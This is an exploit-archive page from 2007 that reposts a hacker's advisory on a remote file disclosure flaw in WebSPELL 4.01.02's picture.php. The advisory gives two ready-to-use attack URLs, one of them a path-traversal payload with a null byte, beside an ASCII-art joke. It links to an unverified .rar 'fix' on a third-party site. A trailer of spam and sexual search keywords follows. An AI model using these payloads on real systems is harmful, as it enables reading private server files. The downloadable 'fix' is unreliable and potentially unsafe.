about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability



2007-04-06 WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability
Rated as : Moderate Risk

# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure
Vulnerability
# Discovered by: Trex
# Visit: www.Trex-Online.net / www.UnderGround.ag
# Comment: Happy easter!
#
#   ___     ___
#  /   \   /   \       ___________________________
# /   / \_/ \   \     /                           \
# \__/\     /\__/    /  GIVE ME A CARROT OR I WILL \
#      \O O/         \      BLOW UP YOUR HOUSE     /
#   ___/ ^ \___      / ___________________________/
#      \___/        /_/
#      _/ \_
#   __//   \\__
#  /___\/_\/___\
#
#
#
# Vulnerability 1:
# Advantage: works independently from PHP version.
# Disadvantage: works dependently from PHP option register_globals (=
on).
#
# http://[SITE][PAHT]/picture.php?file=[FILE]
#
#
#
# Vulnerability 2:
# Advantage: works independently from PHP option register_globals.
# Disadvantage: works dependently from PHP versions (< 4.3.0).
#
# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00
#
#
#
# Solution:
# http://fixes.trex-online.net/picture.rar
securitydot.net - 2007-04-06

Advertising

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 20:08:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
xpHack sexyfilim absolute_p kukusoyo.c www.tamels www.baiaba wwesex.com 30 metry news/explo php-nuke 2 lo828l www.njjxgs /component Www.freeth Valdersoft pinkys wor news for C www.sexpho WWW.CAMWAR php-nuke 2 burning bo HOT+SHEMAL /xpl/explo burning bo Www.sexani www.tamels com_server php-nuke 2 HOT SEXY V php 4 remo php and ap www.teensm 200 /compo Milf hunte news for C axse seks HOT SEXY V Free sex v windows xp php4.4.4 YPB iGeneric i sexyphoto girl anima Nate sxe http://www WWW.INDIAN phpAtm WWW.TAO176